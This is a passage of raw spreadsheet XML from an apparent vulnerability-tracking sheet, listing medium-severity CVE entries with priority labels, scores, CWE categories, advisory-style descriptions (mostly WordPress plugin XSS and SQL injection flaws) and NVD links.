Unscored</t></is></c><c r="B1550" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1550" s="5" t="inlineStr"><is><t>CVE-2026-72999</t></is></c><c r="D1550" s="5" t="n"><v>6.8</v></c><c r="E1550" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1550" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1550" s="5" t="inlineStr" /><c r="H1550" s="5" t="n"><v>0.003</v></c><c r="I1550" s="5" t="inlineStr" /><c r="J1550" s="5" t="inlineStr" /><c r="K1550" s="5" t="inlineStr" /><c r="L1550" s="5" t="inlineStr" /><c r="M1550" s="5" t="inlineStr" /><c r="N1550" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1550" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1550" s="5" t="inlineStr" /><c r="Q1550" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1550" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Hub Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="S1550" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72999</t></is></c></row><row r="1551"><c r="A1551" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1551" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1551" s="5" t="inlineStr"><is><t>CVE-2026-74853</t></is></c><c r="D1551" s="5" t="n"><v>6.8</v></c><c r="E1551" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1551" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1551" s="5" t="inlineStr" /><c r="H1551" s="5" t="n"><v>0.002</v></c><c r="I1551" s="5" t="inlineStr" /><c r="J1551" s="5" t="inlineStr" /><c r="K1551" s="5" t="inlineStr" /><c r="L1551" s="5" t="inlineStr" /><c r="M1551" s="5" t="inlineStr" /><c r="N1551" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1551" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1551" s="5" t="inlineStr" /><c r="Q1551" s="5" t="inlineStr"><is><t>CWE-552</t></is></c><c r="R1551" s="5" t="inlineStr"><is><t>The Pods  WordPress plugin before 3.3.9.2 does not restrict which functions a display callback may resolve to, allowing users with the author role and above to read arbitrary files from the server, including files outside the web root. Only sites using the restricted display-callback mode are affected, which is the automatic default on installations whose first Pods version predates 3.1.</t></is></c><c r="S1551" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74853</t></is></c></row><row r="1552"><c r="A1552" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1552" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1552" s="5" t="inlineStr"><is><t>CVE-2026-74859</t></is></c><c r="D1552" s="5" t="n"><v>6.8</v></c><c r="E1552" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1552" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1552" s="5" t="inlineStr" /><c r="H1552" s="5" t="n"><v>0.001</v></c><c r="I1552" s="5" t="inlineStr" /><c r="J1552" s="5" t="inlineStr" /><c r="K1552" s="5" t="inlineStr" /><c r="L1552" s="5" t="inlineStr" /><c r="M1552" s="5" t="inlineStr" /><c r="N1552" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1552" s="5" t="inlineStr" /><c r="Q1552" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1552" s="5" t="inlineStr"><is><t>The shell theme installer in gnome-tweaks extracts user-supplied ZIP archives without validating archive member paths. As a result, a crafted theme archive can write files outside ~/.themes by using ../ path traversal, absolute paths, or symlink entries.</t></is></c><c r="S1552" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74859</t></is></c></row><row r="1553"><c r="A1553" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1553" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1553" s="5" t="inlineStr"><is><t>CVE-2026-75616</t></is></c><c r="D1553" s="5" t="n"><v>6.8</v></c><c r="E1553" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1553" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1553" s="5" t="inlineStr" /><c r="H1553" s="5" t="n"><v>0.031</v></c><c r="I1553" s="5" t="inlineStr" /><c r="J1553" s="5" t="inlineStr" /><c r="K1553" s="5" t="inlineStr"><is><t>tp-link:archer_c20, tp-link:archer_c20_firmware</t></is></c><c r="L1553" s="5" t="inlineStr" /><c r="M1553" s="5" t="inlineStr" /><c r="N1553" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1553" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P1553" s="5" t="inlineStr" /><c r="Q1553" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R1553" s="5" t="inlineStr"><is><t>An OS command injection vulnerability exists in the web management interface of Archer C20 v6 firmware when processing certain WAN-related configuration operations. An authenticated administrator may exploit insufficient input validation to execute arbitrary system commands, potentially resulting in full device compromise.






Successful exploitation may allow arbitrary command execution with elevated privileges, compromising the confidentiality, integrity, and availability of the affected device and network traffic passing through it.</t></is></c><c r="S1553" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75616</t></is></c></row><row r="1554"><c r="A1554" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1554" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1554" s="5" t="inlineStr"><is><t>CVE-2026-76226</t></is></c><c r="D1554" s="5" t="n"><v>6.8</v></c><c r="E1554" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1554" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1554" s="5" t="inlineStr" /><c r="H1554" s="5" t="n"><v>0.002</v></c><c r="I1554" s="5" t="inlineStr" /><c r="J1554" s="5" t="inlineStr" /><c r="K1554" s="5" t="inlineStr" /><c r="L1554" s="5" t="inlineStr" /><c r="M1554" s="5" t="inlineStr" /><c r="N1554" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1554" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P1554" s="5" t="inlineStr" /><c r="Q1554" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R1554" s="5" t="inlineStr"><is><t>Renovate versions from 43.65.0 before 43.102.11 contain a remote code execution vulnerability in bazel-module and bazelisk managers when using lockFileMaintenance. Attackers can execute arbitrary code by providing malicious dependencies that are referenced in bazel mod deps calls, such as within ctx.execute statements.</t></is></c><c r="S1554" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76226</t></is></c></row><row r="1555"><c r="A1555" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1555" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1555" s="5" t="inlineStr"><is><t>CVE-2026-76227</t></is></c><c r="D1555" s="5" t="n"><v>6.8</v></c><c r="E1555" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1555" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1555" s="5" t="inlineStr" /><c r="H1555" s="5" t="n"><v>0.001</v></c><c r="I1555" s="5" t="inlineStr" /><c r="J1555" s="5" t="inlineStr"><is><t>docker</t></is></c><c r="K1555" s="5" t="inlineStr" /><c r="L1555" s="5" t="inlineStr" /><c r="M1555" s="5" t="inlineStr" /><c r="N1555" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1555" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P1555" s="5" t="inlineStr" /><c r="Q1555" s="5" t="inlineStr"><is><t>CWE-526</t></is></c><c r="R1555" s="5" t="inlineStr"><is><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is></c><c r="S1555" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76227</t></is></c></row><row r="1556"><c r="A1556" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1556" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1556" s="5" t="inlineStr"><is><t>CVE-2026-76845</t></is></c><c r="D1556" s="5" t="n"><v>6.8</v></c><c r="E1556" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1556" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1556" s="5" t="inlineStr" /><c r="H1556" s="5" t="n"><v>0.001</v></c><c r="I1556" s="5" t="inlineStr" /><c r="J1556" s="5" t="inlineStr" /><c r="K1556" s="5" t="inlineStr" /><c r="L1556" s="5" t="inlineStr"><is><t>npm:adm-zip</t></is></c><c r="M1556" s="5" t="inlineStr" /><c r="N1556" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1556" s="5" t="inlineStr" /><c r="P1556" s="5" t="inlineStr" /><c r="Q1556" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="R1556" s="5" t="inlineStr"><is><t>adm-zip 0.5.9 through 0.6.0 follows symbolic links at the extraction destination. Utils.sanitize in util/utils.js enforces containment by comparing only the string form of an archive entry name against the resolved extraction root, and Utils.writeFileTo opens the computed destination with fs.openSync(path, "w", 0o666), which resolves symbolic links and carries neither O_NOFOLLOW nor a pre-write fs.lstatSync check. When a path component at the destination already exists as a symbolic link pointing outside the extraction root, extractAllTo, extractAllToAsync and extractEntryTo write the entry contents through that link and then chmod its target, placing attacker-controlled content in a file outside the root without any traversal sequence appearing in the archive. Reaching the write requires overwrite to be enabled, because the preceding fs.existsSync check also resolves the link and otherwise declines. An attacker able to create a symbolic link inside a shared, reused or predictable extraction directory, such as a temporary directory or a continuous integration workspace, can overwrite any file the extracting process is permitted to write.</t></is></c><c r="S1556" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76845</t></is></c></row><row r="1557"><c r="A1557" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1557" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1557" s="5" t="inlineStr"><is><t>CVE-2026-77892</t></is></c><c r="D1557" s="5" t="n"><v>6.8</v></c><c r="E1557" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1557" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1557" s="5" t="inlineStr" /><c r="H1557" s="5" t="n"><v>0.003</v></c><c r="I1557" s="5" t="inlineStr" /><c r="J1557" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K155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57" s="5" t="inlineStr" /><c r="M1557" s="5" t="inlineStr" /><c r="N1557" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1557" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1557" s="5" t="inlineStr" /><c r="Q1557" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R1557" s="5" t="inlineStr"><is><t>No cwe for this issue in Windows Boot Manager allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="S1557" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77892</t></is></c></row><row r="1558"><c r="A1558" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1558" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1558" s="5" t="inlineStr"><is><t>CVE-2026-78451</t></is></c><c r="D1558" s="5" t="n"><v>6.8</v></c><c r="E1558" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1558" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1558" s="5" t="inlineStr" /><c r="H1558" s="5" t="n"><v>0.004</v></c><c r="I1558" s="5" t="inlineStr" /><c r="J1558" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K155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58" s="5" t="inlineStr" /><c r="M1558" s="5" t="inlineStr" /><c r="N1558" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1558" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1558" s="5" t="inlineStr" /><c r="Q1558" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="R1558" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Microsoft Windows SCSI Class System File allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="S1558" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78451</t></is></c></row><row r="1559"><c r="A1559" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1559" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1559" s="5" t="inlineStr"><is><t>CVE-2026-78579</t></is></c><c r="D1559" s="5" t="n"><v>6.8</v></c><c r="E1559" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1559" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1559" s="5" t="inlineStr" /><c r="H1559" s="5" t="n"><v>0.002</v></c><c r="I1559" s="5" t="inlineStr" /><c r="J1559" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1559" s="5" t="inlineStr" /><c r="L1559" s="5" t="inlineStr" /><c r="M1559" s="5" t="inlineStr" /><c r="N1559" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1559" s="5" t="inlineStr" /><c r="Q1559" s="5" t="inlineStr"><is><t>CWE-90</t></is></c><c r="R1559" s="5" t="inlineStr"><is><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is></c><c r="S1559" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78579</t></is></c></row><row r="1560"><c r="A1560" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1560" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1560" s="5" t="inlineStr"><is><t>CVE-2026-82846</t></is></c><c r="D1560" s="5" t="n"><v>6.8</v></c><c r="E1560" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1560" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1560" s="5" t="inlineStr" /><c r="H1560" s="5" t="n"><v>0.002</v></c><c r="I1560" s="5" t="inlineStr" /><c r="J1560" s="5" t="inlineStr" /><c r="K1560" s="5" t="inlineStr" /><c r="L1560" s="5" t="inlineStr" /><c r="M1560" s="5" t="inlineStr" /><c r="N1560" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1560" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1560" s="5" t="inlineStr" /><c r="Q1560" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1560" s="5" t="inlineStr"><is><t>The Masteriyo LMS  WordPress plugin before 3.4.0 does not sanitise and escape some course settings before outputting them in a page available to all visitors, allowing users with a course-author role to perform Stored Cross-Site Scripting attacks that run in the session of anyone viewing the course, including a logged-in administrator.</t></is></c><c r="S1560" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82846</t></is></c></row><row r="1561"><c r="A1561" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1561" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1561" s="5" t="inlineStr"><is><t>CVE-2026-83544</t></is></c><c r="D1561" s="5" t="n"><v>6.8</v></c><c r="E1561" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1561" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1561" s="5" t="inlineStr" /><c r="H1561" s="5" t="n"><v>0.002</v></c><c r="I1561" s="5" t="inlineStr" /><c r="J1561" s="5" t="inlineStr" /><c r="K1561" s="5" t="inlineStr" /><c r="L1561" s="5" t="inlineStr" /><c r="M1561" s="5" t="inlineStr" /><c r="N1561" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1561" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1561" s="5" t="inlineStr" /><c r="Q1561" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1561" s="5" t="inlineStr"><is><t>The Greenshift  WordPress plugin before 13.2.0 does not properly escape a block animation attribute before outputting it within an HTML attribute, allowing users with contributor-level access and above to inject arbitrary web scripts that execute when the content is viewed.</t></is></c><c r="S1561" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83544</t></is></c></row><row r="1562"><c r="A1562" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1562" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1562" s="5" t="inlineStr"><is><t>CVE-2026-84021</t></is></c><c r="D1562" s="5" t="n"><v>6.8</v></c><c r="E1562" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1562" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1562" s="5" t="inlineStr" /><c r="H1562" s="5" t="n"><v>0.002</v></c><c r="I1562" s="5" t="inlineStr" /><c r="J1562" s="5" t="inlineStr" /><c r="K1562" s="5" t="inlineStr" /><c r="L1562" s="5" t="inlineStr" /><c r="M1562" s="5" t="inlineStr" /><c r="N1562" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1562" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1562" s="5" t="inlineStr" /><c r="Q1562" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1562" s="5" t="inlineStr"><is><t>The Bold Page Builder WordPress plugin before 5.9.8 does not properly validate a link URL before outputting it in an HTML attribute, relying on a filter that can be evaded, allowing users with the Contributor role and above to inject arbitrary web scripts that execute when a user clicks the affected link.</t></is></c><c r="S1562" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84021</t></is></c></row><row r="1563"><c r="A1563" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1563" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1563" s="5" t="inlineStr"><is><t>CVE-2026-84022</t></is></c><c r="D1563" s="5" t="n"><v>6.8</v></c><c r="E1563" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1563" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1563" s="5" t="inlineStr" /><c r="H1563" s="5" t="n"><v>0.002</v></c><c r="I1563" s="5" t="inlineStr" /><c r="J1563" s="5" t="inlineStr" /><c r="K1563" s="5" t="inlineStr" /><c r="L1563" s="5" t="inlineStr" /><c r="M1563" s="5" t="inlineStr" /><c r="N1563" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1563" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1563" s="5" t="inlineStr" /><c r="Q1563" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1563" s="5" t="inlineStr"><is><t>The Bold Page Builder WordPress plugin before 5.9.8 does not sanitise and escape several shortcode attributes before outputting them in HTML attributes, allowing users with the Contributor role and above to inject arbitrary web scripts that execute when a user views the affected page.</t></is></c><c r="S1563" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84022</t></is></c></row><row r="1564"><c r="A1564" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1564" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1564" s="5" t="inlineStr"><is><t>CVE-2026-84028</t></is></c><c r="D1564" s="5" t="n"><v>6.8</v></c><c r="E1564" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1564" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1564" s="5" t="inlineStr" /><c r="H1564" s="5" t="n"><v>0.002</v></c><c r="I1564" s="5" t="inlineStr" /><c r="J1564" s="5" t="inlineStr" /><c r="K1564" s="5" t="inlineStr" /><c r="L1564" s="5" t="inlineStr" /><c r="M1564" s="5" t="inlineStr" /><c r="N1564" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1564" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1564" s="5" t="inlineStr" /><c r="Q1564" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1564" s="5" t="inlineStr"><is><t>The Bold Page Builder WordPress plugin before 5.9.9 does not sanitise and escape a shortcode attribute before outputting it in an HTML attribute, allowing users with the Contributor role and above to inject arbitrary web scripts that execute when a user views the affected page.</t></is></c><c r="S1564" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84028</t></is></c></row><row r="1565"><c r="A1565" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1565" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1565" s="5" t="inlineStr"><is><t>CVE-2026-84221</t></is></c><c r="D1565" s="5" t="n"><v>6.8</v></c><c r="E1565" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1565" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1565" s="5" t="inlineStr" /><c r="H1565" s="5" t="n"><v>0.002</v></c><c r="I1565" s="5" t="inlineStr" /><c r="J1565" s="5" t="inlineStr" /><c r="K1565" s="5" t="inlineStr" /><c r="L1565" s="5" t="inlineStr" /><c r="M1565" s="5" t="inlineStr" /><c r="N1565" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1565" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1565" s="5" t="inlineStr" /><c r="Q1565" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1565" s="5" t="inlineStr"><is><t>The Kirki  WordPress plugin before 6.3.0 does not escape a user-supplied identifier before using it in a SQL query, allowing users with editor-level access and above to append arbitrary SQL and read the contents of the database, including user credentials.</t></is></c><c r="S1565" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84221</t></is></c></row><row r="1566"><c r="A1566" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1566" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1566" s="5" t="inlineStr"><is><t>CVE-2026-84896</t></is></c><c r="D1566" s="5" t="n"><v>6.8</v></c><c r="E1566" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1566" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1566" s="5" t="inlineStr" /><c r="H1566" s="5" t="n"><v>0.002</v></c><c r="I1566" s="5" t="inlineStr" /><c r="J1566" s="5" t="inlineStr" /><c r="K1566" s="5" t="inlineStr" /><c r="L1566" s="5" t="inlineStr" /><c r="M1566" s="5" t="inlineStr" /><c r="N1566" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1566" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1566" s="5" t="inlineStr" /><c r="Q1566" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1566" s="5" t="inlineStr"><is><t>The King Addons for Elementor  WordPress plugin before 51.1.77 does not escape a widget display-style setting before outputting it in an HTML attribute, allowing users with Contributor-level access and above to store JavaScript that executes in the browser of any visitor to the affected page, including logged-in administrators.</t></is></c><c r="S1566" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84896</t></is></c></row><row r="1567"><c r="A1567" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1567" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1567" s="5" t="inlineStr"><is><t>CVE-2026-84899</t></is></c><c r="D1567" s="5" t="n"><v>6.8</v></c><c r="E1567" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1567" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1567" s="5" t="inlineStr" /><c r="H1567" s="5" t="n"><v>0.002</v></c><c r="I1567" s="5" t="inlineStr" /><c r="J1567" s="5" t="inlineStr" /><c r="K1567" s="5" t="inlineStr" /><c r="L1567" s="5" t="inlineStr" /><c r="M1567" s="5" t="inlineStr" /><c r="N1567" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1567" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1567" s="5" t="inlineStr" /><c r="Q1567" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1567" s="5" t="inlineStr"><is><t>The VikWidgetsLoader  WordPress plugin before 1.12.0 does not sanitise or escape a block attribute before outputting it inside an inline script, allowing users with the Contributor role to store arbitrary JavaScript that executes in the browser of any user viewing the affected post, including the administrator who reviews the pending submission.</t></is></c><c r="S1567" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84899</t></is></c></row><row r="1568"><c r="A1568" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1568" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1568" s="5" t="inlineStr"><is><t>CVE-2026-84930</t></is></c><c r="D1568" s="5" t="n"><v>6.8</v></c><c r="E1568" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1568" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1568" s="5" t="inlineStr" /><c r="H1568" s="5" t="n"><v>0.002</v></c><c r="I1568" s="5" t="inlineStr" /><c r="J1568" s="5" t="inlineStr" /><c r="K1568" s="5" t="inlineStr" /><c r="L1568" s="5" t="inlineStr" /><c r="M1568" s="5" t="inlineStr" /><c r="N1568" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1568" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1568" s="5" t="inlineStr" /><c r="Q1568" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1568" s="5" t="inlineStr"><is><t>The CatFolders Document Gallery &amp; PDF Library WordPress plugin before 2.0.7 does not properly validate a block attribute before using it as an HTML tag name in its gallery output, allowing users with the Author role and above to inject arbitrary web scripts that execute in the browser of anyone who views the affected post.</t></is></c><c r="S1568" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84930</t></is></c></row><row r="1569"><c r="A1569" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1569" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1569" s="5" t="inlineStr"><is><t>CVE-2026-84931</t></is></c><c r="D1569" s="5" t="n"><v>6.8</v></c><c r="E1569" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1569" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1569" s="5" t="inlineStr" /><c r="H1569" s="5" t="n"><v>0.002</v></c><c r="I1569" s="5" t="inlineStr" /><c r="J1569" s="5" t="inlineStr" /><c r="K1569" s="5" t="inlineStr" /><c r="L1569" s="5" t="inlineStr" /><c r="M1569" s="5" t="inlineStr" /><c r="N1569" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1569" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1569" s="5" t="inlineStr" /><c r="Q1569" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1569" s="5" t="inlineStr"><is><t>The Joli Table Of Contents WordPress plugin before 3.0.3 does not sanitise or escape a shortcode attribute value before outputting it inside an HTML element's attribute, allowing users with the Author role and above to inject arbitrary HTML attributes and JavaScript that execute in the browser of any user who views the post, including higher-privileged users such as administrators. This crosses a privilege boundary even on multisite, where such users are not permitted to post unfiltered HTML.</t></is></c><c r="S1569" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84931</t></is></c></row><row r="1570"><c r="A1570" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1570" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1570" s="5" t="inlineStr"><is><t>CVE-2026-84937</t></is></c><c r="D1570" s="5" t="n"><v>6.8</v></c><c r="E1570" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1570" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1570" s="5" t="inlineStr" /><c r="H1570" s="5" t="n"><v>0.002</v></c><c r="I1570" s="5" t="inlineStr" /><c r="J1570" s="5" t="inlineStr" /><c r="K1570" s="5" t="inlineStr" /><c r="L1570" s="5" t="inlineStr" /><c r="M1570" s="5" t="inlineStr" /><c r="N1570" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1570" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1570" s="5" t="inlineStr" /><c r="Q1570" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1570" s="5" t="inlineStr"><is><t>The Video Player for YouTube  WordPress plugin before 2.1.0 does not properly sanitise and escape user-supplied input before using it in a SQL statement, allowing users with the Contributor role and above to perform SQL injection attacks and read arbitrary data from the database.</t></is></c><c r="S1570" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84937</t></is></c></row><row r="1571"><c r="A1571" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1571" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1571" 